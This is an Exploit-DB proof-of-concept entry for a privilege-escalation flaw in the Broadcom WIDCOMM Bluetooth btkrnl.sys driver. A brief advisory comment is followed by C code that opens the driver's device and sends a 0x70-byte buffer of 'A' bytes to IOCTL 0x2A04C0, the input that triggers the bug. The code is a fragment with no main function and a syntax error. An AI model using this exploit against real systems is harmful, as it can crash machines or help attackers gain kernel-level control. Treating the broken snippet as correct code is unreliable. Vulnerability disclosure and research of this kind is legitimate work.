Broadcom WIDCOMM Bluetooth - 'btkrnl.sys' Driver Privilege Escalation

EDB-ID:

37964

CVE:

N/A




Platform:

Windows

Date:

2012-10-18


/*
source: https://www.securityfocus.com/bid/56124/info

Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.

Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected. 
*/

HANDLE   hDevice;
    char *inbuff, *outbuff;
    DWORD ioctl, len,;
 
    if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
                                              0,
                                              0,
                                              0,
                                              OPEN_EXISTING,
                                              0,
                                              NULL) ) != INVALID_HANDLE_VALUE )
    {
            printf("Device succesfully opened!\n");
    }
    else
    {
            printf("Error: Error opening device \n");
            return 0;
    }
    inbuff = (char*)malloc(0x12000);
    if(!inbuff){
            printf("malloc failed!\n");
            return 0;
    }
    outbuff = (char*)malloc(0x12000);
    if(!outbuff){
            printf("malloc failed!\n");
            return 0;
    }
        ioctl = 0x2A04C0;
        memset(inbuff, 0x41, 0x70);    
        DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);